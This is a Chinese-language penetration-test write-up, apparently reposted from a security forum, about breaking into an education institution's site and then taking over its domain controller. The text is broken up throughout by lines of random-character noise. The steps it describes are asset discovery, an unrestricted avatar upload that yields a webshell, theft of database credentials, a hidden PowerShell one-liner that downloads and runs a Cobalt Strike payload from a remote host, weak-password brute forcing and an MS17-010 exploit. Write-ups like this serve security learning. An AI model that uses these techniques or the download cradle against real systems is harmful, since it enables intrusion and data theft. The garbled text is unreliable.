. w& K4 N5 h& p* H4 Q
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路0 y" K6 R6 R, j% d
, ^) L; a j) O* l) G# F8 p1 m' D
, f, G b) n* R; E" o
/ v6 d* X3 P9 P: c$ b
$ G8 Y1 h7 I$ V& J 正文3 t$ J; n6 m4 j% `6 O: a
% V" i1 D# ^; }' z
S9 [1 b) E; V7 t% C: o
# [7 r4 `7 s+ x; E* [% W$ t g1 R0 l9 g- A7 A# _ [0 B
' i5 Z! b. ~5 f2 O8 S6 R 目标:www.xxxx.com(一家教育机构) 5 a t" Z& X" C
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
7 }& u1 `! \! r1 s
" h% ]5 b' l+ t. e0 a V
a# Y& m( s1 R P3 m9 y $ M: S* [5 A: J/ E6 ?, s
& g3 U* R7 |2 @" J5 \! M
6 H c7 h( S- m: I. F 进行了简单的信息搜集
, |* A8 |( {( E0 B7 t; u% K , H; k0 @; R6 ?5 a) E f
2 u' A. j a0 F8 |' [
% [+ B6 F9 ?0 K2 i4 |5 u N- I# m" {2 Q! N* Y3 x
子域名搜集
% {0 u; M+ W: j2 z( t% d
y |, q. D$ @ K2 b1 k' Y) i* k. t5 R
+ _* i- l9 U1 I6 p+ F- p4 k- M
: `9 M. E; W0 u$ `$ k6 G! e n. q% u; {# H) Y& H" o/ a4 V! h
fofa找资产 5 L: T+ u& v; F
; o& g' b" W% B$ ]8 _2 _
" W0 T: b: l- w' f4 M& B4 n
4 q5 M" Q0 y. s2 d( E% }6 e( V& ]+ j! p2 H3 `2 w& k& i c |
% `1 e7 ^' v; `; ~
0 d3 n( |' V2 n' ], m5 i
3 x c C- V! A {* E* l# } 一共七个资产。去重之后只有两个。
6 m0 ]; ~, _0 D! `4 F . s/ U8 o2 q9 `3 |1 l, _
, M: d" m# l% Z! B5 h 4 Q5 k6 E7 z+ k0 _
8 X6 P+ O7 R3 c( R1 C5 l) S0 @ 目录探测6 ~1 C( P- d+ I2 B
) z! P) o- ]+ p( B
% S$ ~- c' p! B1 ~ 8 `! e% n) n6 {, p
2 G1 d+ a3 H U0 u& g3 f9 p
1 {3 r: s- e, R! S6 D) e+ C: ^ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 & D1 t" ~- w3 A7 ]- @3 v
5 J+ A5 i* ~4 S% G; D, s$ u( l1 `! u _
# m: I9 P: j/ H4 i
' o1 x6 ~7 ^8 x# p5 t5 Y3 [
2 E" j* M* ~7 D/ g
我又尝试了通过修改返回包来绕过登录界面
1 ^6 z( J4 c2 d8 y" P7 D; {
; l- \3 J& N+ B# T9 \( F/ M
6 Z: D' e k% F. W$ u
, s; H& o, M8 \! {6 t) o2 Q2 Y
U1 O' D" o3 M1 o
' r' k7 L$ g. z7 H; W T' V 还是不行,尝试注入无果
' H# D: X5 F8 k9 N& B
, A c; l0 x& {6 [; S6 d" s) J4 w, P
5 \8 Y8 Y8 n) Z 7 v. G3 Y& x1 `$ p+ e+ u `
- s* f- D0 a, a
+ |6 ` ~. R" c4 R' \2 ~& C 不过我目录探测出了一处Spring信息泄露
: c; H$ m5 i; m' E
2 A2 k! G) Q! {: J8 y- s4 F4 B) P9 J0 w7 S
- \: ^! m2 c! P& A* a" N+ Q
* N1 _9 o- Y( G6 `4 T T
0 y' l0 K* A7 k; H$ c
4 S0 s/ L9 d N0 c; D
6 K+ @( w& V3 Z4 q! A6 N 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录- k0 |* i" A1 ]$ `
" J5 T8 @* ^( u+ z
/ r$ f8 v* v9 u2 o1 R4 g4 [ W
3 W1 B- m, |5 x
* P8 ]3 l! \9 [+ V5 v% |) P0 ^* k4 @; s# A
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
4 }8 G; R: g' z0 H9 ~ 8 j _. y! l# _" b
7 Y1 p6 i; a6 v' s/ s& [ G; |* P- Y1 o
/ a8 R+ j; y% \# n6 q; C
. x$ w& z! b$ F0 E5 I" i: D
获取有些师傅到这一步就手机抓包电脑测了。: i+ m* k% s2 B% n# Z/ P4 |
& b& L6 N9 W& Z. L- p$ K* i5 j3 ?1 e$ @
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
7 D' Q! U8 A9 P3 r" E 1 L+ i4 n5 I! J
6 b8 Z8 Q' a" s. ^; y4 I/ c4 X 其中在一个公众号发现了小程序,可以进行注册。
) _! q, d: N/ a* q" {) w# Y & @$ N+ H, p" j, F
. g" {# L2 o; y5 A! g" R 看到了头像上传,尝试上传获取WebShell4 P, z7 k# P7 O; a9 `1 ?- a: _
. Z: y; J# O/ E4 E
* \2 x3 U; \2 y. Y8 ~
# ]% V5 I9 V0 v' P6 Y2 T% H5 g
9 s4 l2 ~5 N) M6 a
: a/ t, l, Q5 a& h# J 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
+ S2 n8 \7 z4 Y( E1 E
& ~5 O, S9 I" K9 q2 o2 P
5 T# Z0 _2 ]9 {0 V ( p* g1 ^- ]5 x6 k- z8 j
$ b {" ?4 n9 E7 `
9 @1 s' S1 v! N' o) g. p
然后上了大马" s( h/ {. h7 i- g+ O3 b
! c& l$ G$ l; u% D6 y
+ m5 P3 i. b$ x8 K2 @3 m+ [. d( J2 h
& E% d- o' O3 w' B( ]7 |
2 Y' D, ?( d/ T. d- }) q; U/ s# ^& k- Q4 y! j& T
6 X, C1 g5 _7 F- |7 d0 f. t
+ S6 G x. y8 E2 L* @2 h0 a" L/ W0 [/ Q6 p
通过翻找文件发现数据库账号密码
; @% B: i( l( Q4 K; z# ^
* u' `4 c, j+ P8 A9 X6 l$ s3 l+ D# L/ Z- R; U" {0 p
7 D2 U) S+ z9 d& n$ B+ {: W- b# p7 B7 E * i- i! E! q' X y+ k* t0 [
?- v9 x- z" { A: g/ f* F --内网渗透0 I# P( m- ^* X) u- B) Y
% T2 |6 ^+ E" a2 H Z
: x* T1 A$ E) v- H/ G 直接通过powershell执行 cs上线
2 S9 P. ^) T$ t ' h* y7 x( T, m8 H
5 v% _1 C# u7 W# J& k powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"% C/ j# E3 \; a" P+ V! d1 \! ?
9 ^ ^" F/ S' `3 J2 s3 v. L4 ^3 A: W
4 M, o7 `8 e/ |/ y0 ] 4 z$ T( R( t- K N6 x- D2 o+ V8 ^
# L p4 K4 i; y- \, I
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
0 c& v- S( x9 I) \' P2 Y
5 t0 ?* U; o% M
; t! l) Y3 y* C6 d7 y2 u9 C 8 g5 a+ Q0 A; U8 P
& O u" n+ u T5 ~$ x
4 L9 S, E# u9 G& b# ]6 U6 q 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 " {4 y/ O1 [0 ~# l3 O
: \+ v/ e1 K! }8 \9 O9 L' q
5 B; n) }, i. t0 }( g* K, X4 r
1 u1 [ |7 O5 D% Y9 E$ `& ~
7 Q. W; [0 u$ `! D0 C w. n" j. z) I, T
( N. f2 u, w* G! B/ D3 v ! c6 a' F) v! q9 D
' ?( [8 O2 Y- \, M6 ?( Q
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 2 T2 }/ X! y9 t0 ~
( b' {! u" [$ H* C# D) [# Z. p$ M* h6 \5 @( Z. H* [: v
; t* i+ t5 O$ u. {; X7 u
* }& Y6 N; }# o& M
, F# r. ?9 c7 w ~' g( O , Q" l1 g0 n: A1 ]
0 f9 j8 x1 Z3 u" X' G; Q, C
1 m; M3 k* T. }( d* E- u- @
% y Z' b, r) ]* l! b+ Z& I% U" E( F( h, q3 w+ V
# n& M3 {! |0 x- C1 \+ s3 x( i- @$ ?% Z* y* \3 S0 Q( p
" J+ w3 h# B T# d' i, }% F
9 f! v! ?4 d7 o4 j7 a. K3 \
0 {0 R. \" u# t 小结
$ P; e4 y: z5 k% } 1 T& ]9 j9 U( E1 y4 W) h
' r8 i* u0 V! |
; S% T6 P! `; ~' p6 Y- h
+ c" ` x! f3 H2 v* i! r7 x% J4 ~& K) P) X* x
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
+ j- x S9 z$ k, J1 b
0 R: Z7 o, k6 J9 v* A8 q4 [; J! p! C$ }' M
# h7 }5 {7 R K$ z 9 k5 n& W/ d/ V
3 S# Z/ b- }' f
- 6 ]# e' p \$ S# ?# c1 a
* F2 i1 c/ j! O9 X9 A) e, V
7 \! x% w5 u& i/ Q7 S+ v' @ -
8 x' `8 A% H; r9 Q: Y+ ` 0 E: @8 H9 S) F2 B* C! [
$ Y- K( t9 K$ w$ I4 `5 s
8 V6 Z6 b) I" W) T# \" ~
! h6 B: z% G# Y) L+ X3 [7 v5 E' B2 a8 ?
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html5 H. K! \$ A. l2 e* S# d* K0 E
" Y$ D& p+ y$ p0 i) l* s+ Z- R) T* J6 H: M
& z! q" S: Z0 m7 F! _ 6 O5 J3 ~( O6 X% J3 I
|